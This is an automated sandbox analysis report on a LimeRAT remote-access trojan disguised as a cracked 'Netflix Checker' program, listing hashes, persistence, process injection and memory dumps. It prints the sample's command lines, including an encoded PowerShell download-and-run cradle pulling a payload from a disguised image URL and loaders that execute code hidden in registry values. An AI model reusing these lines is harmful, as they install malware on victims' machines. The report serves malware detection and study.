limerat | 85e6f154baa5c3d5dcbf1b16ed811bbf643582b194d22aaeb440195640d881dd

Analysis

max time kernel
150s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
19-03-2023 12:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Netflix Checker by GOD Cracked By GM`ka/Netflix by GOD Cracked By GM`ka.exe
Size

184KB
MD5

aa3bb11ee0c84761496dfdb9e6e5b63f
SHA1

8abbf52400836f9e2cc8695f31a44398f0a8a220
SHA256

4b4be96ea88ab429172e0ff04475179478f7afd2784ec0a07ae4bc78b2104d3a
SHA512

3643410c32ccb5202c1bbb8cf79f65bcb7accd36cce45672eacd71c051a2b7e0f253bd18979ac68d91b2272b6666d10916788bf9d340abd660b0f42144dc44d9
SSDEEP

1536:SX4ljePvu7ZTJqCgiv/RbgyPnY9dF0IaJZI6huB2vtChPw:SX4ljH/q4bg4nY9dt2vtChPw

Score

10^/10

limerat rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://6.top4top.net/p_13529t6r71.jpg

Signatures

LimeRAT
Simple yet powerful RAT for Windows machines written in .NET.
rat limerat

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exepowershell.exe

flow	pid	Process
29	4004	powershell.exe
49	3744	powershell.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Netflix by GOD Cracked By GM`ka.exeWScript.exeWScript.exeWScript.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	Netflix by GOD Cracked By GM`ka.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 2 IoCs

Processes:

WScript.exeWScript.exe

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PoYUIXZO.lnk	WScript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KBnSgEeuZWeY.lnk	WScript.exe

Executes dropped EXE 1 IoCs

Processes:

Checker Netflix.exe

pid	Process
4376	Checker Netflix.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies registry class 1 IoCs

Processes:

procs.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\Local Settings	procs.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid	Process
4004	powershell.exe
4004	powershell.exe
1880	powershell.exe
3744	powershell.exe
1880	powershell.exe
1880	powershell.exe
3744	powershell.exe
3744	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	4004	powershell.exe
Token: SeDebugPrivilege	1880	powershell.exe
Token: SeDebugPrivilege	3744	powershell.exe
Token: SeDebugPrivilege	3744	powershell.exe

Suspicious use of WriteProcessMemory 24 IoCs

Processes:

Netflix by GOD Cracked By GM`ka.exeprocs.exeWScript.exeWScript.exeWScript.exe

description	pid	Process	procid_target
PID 1456 wrote to memory of 4572	1456	Netflix by GOD Cracked By GM`ka.exe	89
PID 1456 wrote to memory of 4572	1456	Netflix by GOD Cracked By GM`ka.exe	89
PID 1456 wrote to memory of 4572	1456	Netflix by GOD Cracked By GM`ka.exe	89
PID 4572 wrote to memory of 4376	4572	procs.exe	90
PID 4572 wrote to memory of 4376	4572	procs.exe	90
PID 4572 wrote to memory of 4376	4572	procs.exe	90
PID 4572 wrote to memory of 4740	4572	procs.exe	91
PID 4572 wrote to memory of 4740	4572	procs.exe	91
PID 4572 wrote to memory of 4740	4572	procs.exe	91
PID 4572 wrote to memory of 2948	4572	procs.exe	92
PID 4572 wrote to memory of 2948	4572	procs.exe	92
PID 4572 wrote to memory of 2948	4572	procs.exe	92
PID 4572 wrote to memory of 404	4572	procs.exe	93
PID 4572 wrote to memory of 404	4572	procs.exe	93
PID 4572 wrote to memory of 404	4572	procs.exe	93
PID 2948 wrote to memory of 4004	2948	WScript.exe	94
PID 2948 wrote to memory of 4004	2948	WScript.exe	94
PID 2948 wrote to memory of 4004	2948	WScript.exe	94
PID 404 wrote to memory of 1880	404	WScript.exe	97
PID 404 wrote to memory of 1880	404	WScript.exe	97
PID 404 wrote to memory of 1880	404	WScript.exe	97
PID 4740 wrote to memory of 3744	4740	WScript.exe	99
PID 4740 wrote to memory of 3744	4740	WScript.exe	99
PID 4740 wrote to memory of 3744	4740	WScript.exe	99

C:\Users\Admin\AppData\Local\Temp\Netflix Checker by GOD Cracked By GM`ka\Netflix by GOD Cracked By GM`ka.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Checker by GOD Cracked By GM`ka\Netflix by GOD Cracked By GM`ka.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1456
- C:\Users\Admin\AppData\Local\Temp\Netflix Checker by GOD Cracked By GM`ka\xNet\procs.exe
  "C:\Users\Admin\AppData\Local\Temp\Netflix Checker by GOD Cracked By GM`ka\xNet\procs.exe"
  2⤵
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:4572
- - C:\Users\Admin\AppData\Roaming\Checker Netflix.exe
    "C:\Users\Admin\AppData\Roaming\Checker Netflix.exe"
    3⤵
    - Executes dropped EXE
    PID:4376
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\l1l1l.vbs"
    3⤵
    - Checks computer location settings
    - Drops startup file
    - Suspicious use of WriteProcessMemory
    PID:4740
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit [Reflection.Assembly]::'Load'((Get-ItemProperty HKCU:\Software\tsQKDrCBEkat).evTHJP).'EntryPoint'.'Invoke'($Null,$Null)
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3744
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\powershell.js"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:2948
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAGIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8ANgAuAHQAbwBwADQAdABvAHAALgBuAGUAdAAvAHAAXwAxADMANQAyADkAdAA2AHIANwAxAC4AagBwAGcAJwApACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAbgB1AGwAbAApAA==
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4004
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\r1r1.vbs"
    3⤵
    - Checks computer location settings
    - Drops startup file
    - Suspicious use of WriteProcessMemory
    PID:404
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit [Reflection.Assembly]::'Load'((Get-ItemProperty HKCU:\Software\vLEwUGUT).gukeLLVoun).'EntryPoint'.'Invoke'($Null,$Null)
      4⤵
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1880

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Web Service

T1102

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
eec69f1a7eff9b5f29366da620e7de88

SHA1
be3b8ae89646aa781dfeb338ecf1b10a8c0c6060

SHA256
ffc642634c4337f759852084b94b5bbbb247285d16408d4bec65f240004af5c2

SHA512
70d7184fdd97388eb5eeeab2fb716e96a1a4d3a4339e83e98a9b2ca3621c19d379936a108b49d11da971cc428683835f44fc21c59ffb014e3fb5f19c07aa5061

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_35ovzqle.wu1.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Checker Netflix.exe

Filesize
1.5MB

MD5
068068c3cefb4c8d997271897c3173bb

SHA1
d2c22b2c05f2a5c953f9a8a728435b3ba2a9954e

SHA256
23d57dd5576d4a2841457ef578455fd1c61c21758a9b325469e57d0c5f88f7b5

SHA512
0b8c7c29654505f085de12c7663edc326333a439df37d7f48e61019c885ed0810ba492046eac6b2ca4a2a6c75544ad7347cb54869015980fabd85deefc0e549a

Download Submit
C:\Users\Admin\AppData\Roaming\Checker Netflix.exe

Filesize
1.5MB

MD5
068068c3cefb4c8d997271897c3173bb

SHA1
d2c22b2c05f2a5c953f9a8a728435b3ba2a9954e

SHA256
23d57dd5576d4a2841457ef578455fd1c61c21758a9b325469e57d0c5f88f7b5

SHA512
0b8c7c29654505f085de12c7663edc326333a439df37d7f48e61019c885ed0810ba492046eac6b2ca4a2a6c75544ad7347cb54869015980fabd85deefc0e549a

Download Submit
C:\Users\Admin\AppData\Roaming\Checker Netflix.exe

Filesize
1.5MB

MD5
068068c3cefb4c8d997271897c3173bb

SHA1
d2c22b2c05f2a5c953f9a8a728435b3ba2a9954e

SHA256
23d57dd5576d4a2841457ef578455fd1c61c21758a9b325469e57d0c5f88f7b5

SHA512
0b8c7c29654505f085de12c7663edc326333a439df37d7f48e61019c885ed0810ba492046eac6b2ca4a2a6c75544ad7347cb54869015980fabd85deefc0e549a

Download Submit
C:\Users\Admin\AppData\Roaming\l1l1l.vbs

Filesize
129KB

MD5
c78f607c916f060d6ee3bf391e303acc

SHA1
1575998cda060d4a570ba258abc12044601da283

SHA256
f1e57d1714f74c6939ee24bb348fa12e925ec7eb380d5a7d0f1d230effb742f4

SHA512
cf26b8b381402622df420fa3881630661d08d76660d01be2d695af8ade568a6f5e3b365e4b17bffee5589d936eeaad3f7ebf413f4a2d810d976b66511548875b

Download Submit
C:\Users\Admin\AppData\Roaming\powershell.js

Filesize
2KB

MD5
40b65baa1541784dd92f5aa8ae11b0ef

SHA1
0772c95f56a025704c01389f2d1108a17fb987cf

SHA256
9609d3a8ee7d439c54aca9c5aeced07caa4199f116367ecb88b63e9e2e29a699

SHA512
fc784babe03c75559314dc15a04386d528e71b003b40349df2a4845576bbc9d2f0898d27fc5b1be8cda9fbf16715822bf0616fa7835e1abefe7ccacc8da3b3d2

Download Submit
C:\Users\Admin\AppData\Roaming\r1r1.vbs

Filesize
87KB

MD5
0494f414da149631c3d59861865dad37

SHA1
c9fd335759efb52e58acb974af27cdecb35d0f10

SHA256
a2effa9551b467c88ccea70024bd13650267752d1d6bcd91a5bd6915d9c47a56

SHA512
a86f2532f2ba996dc8421146d918250b1925daf803a470e3bce312f29a4d0b25af51d4abc005ab390650cb0cf6b4024df3c411e6ae4ed03cd51906b54683f333

Download Submit
memory/1456-139-0x0000000004EC0000-0x0000000004ED0000-memory.dmp

Filesize
64KB

Download
memory/1456-138-0x0000000004E00000-0x0000000004E56000-memory.dmp

Filesize
344KB

Download
memory/1456-137-0x0000000004BD0000-0x0000000004BDA000-memory.dmp

Filesize
40KB

Download
memory/1456-136-0x0000000004C70000-0x0000000004D02000-memory.dmp

Filesize
584KB

Download
memory/1456-135-0x0000000005180000-0x0000000005724000-memory.dmp

Filesize
5.6MB

Download
memory/1456-134-0x0000000004B30000-0x0000000004BCC000-memory.dmp

Filesize
624KB

Download
memory/1456-133-0x0000000000140000-0x0000000000174000-memory.dmp

Filesize
208KB

Download
memory/1880-207-0x00000000047F0000-0x0000000004800000-memory.dmp

Filesize
64KB

Download
memory/1880-212-0x0000000006CC0000-0x0000000006D04000-memory.dmp

Filesize
272KB

Download
memory/1880-214-0x0000000006E20000-0x0000000006EB6000-memory.dmp

Filesize
600KB

Download
memory/1880-227-0x00000000047F0000-0x0000000004800000-memory.dmp

Filesize
64KB

Download
memory/1880-215-0x0000000006DF0000-0x0000000006E12000-memory.dmp

Filesize
136KB

Download
memory/1880-216-0x00000000047F0000-0x0000000004800000-memory.dmp

Filesize
64KB

Download
memory/1880-223-0x00000000047F0000-0x0000000004800000-memory.dmp

Filesize
64KB

Download
memory/1880-222-0x00000000047F0000-0x0000000004800000-memory.dmp

Filesize
64KB

Download
memory/1880-218-0x0000000007A20000-0x0000000007A96000-memory.dmp

Filesize
472KB

Download
memory/1880-208-0x00000000047F0000-0x0000000004800000-memory.dmp

Filesize
64KB

Download
memory/3744-225-0x0000000002F20000-0x0000000002F30000-memory.dmp

Filesize
64KB

Download
memory/3744-209-0x0000000002F20000-0x0000000002F30000-memory.dmp

Filesize
64KB

Download
memory/3744-217-0x0000000002F20000-0x0000000002F30000-memory.dmp

Filesize
64KB

Download
memory/3744-210-0x0000000002F20000-0x0000000002F30000-memory.dmp

Filesize
64KB

Download
memory/3744-224-0x0000000002F20000-0x0000000002F30000-memory.dmp

Filesize
64KB

Download
memory/3744-228-0x0000000002F20000-0x0000000002F30000-memory.dmp

Filesize
64KB

Download
memory/4004-168-0x0000000004D70000-0x0000000005398000-memory.dmp

Filesize
6.2MB

Download
memory/4004-182-0x0000000005480000-0x00000000054E6000-memory.dmp

Filesize
408KB

Download
memory/4004-211-0x0000000007360000-0x00000000079DA000-memory.dmp

Filesize
6.5MB

Download
memory/4004-167-0x0000000004660000-0x0000000004696000-memory.dmp

Filesize
216KB

Download
memory/4004-175-0x0000000005410000-0x0000000005476000-memory.dmp

Filesize
408KB

Download
memory/4004-220-0x0000000004730000-0x0000000004740000-memory.dmp

Filesize
64KB

Download
memory/4004-221-0x0000000004730000-0x0000000004740000-memory.dmp

Filesize
64KB

Download
memory/4004-193-0x0000000005AF0000-0x0000000005B0E000-memory.dmp

Filesize
120KB

Download
memory/4004-176-0x0000000004730000-0x0000000004740000-memory.dmp

Filesize
64KB

Download
memory/4004-171-0x0000000004D30000-0x0000000004D52000-memory.dmp

Filesize
136KB

Download
memory/4004-213-0x0000000006000000-0x000000000601A000-memory.dmp

Filesize
104KB

Download
memory/4004-187-0x0000000004730000-0x0000000004740000-memory.dmp

Filesize
64KB

Download
memory/4376-226-0x00000000058D0000-0x00000000058E0000-memory.dmp

Filesize
64KB

Download
memory/4376-219-0x00000000058D0000-0x00000000058E0000-memory.dmp

Filesize
64KB

Download
memory/4376-172-0x00000000058D0000-0x00000000058E0000-memory.dmp

Filesize
64KB

Download
memory/4376-161-0x0000000000EB0000-0x0000000001030000-memory.dmp

Filesize
1.5MB

Download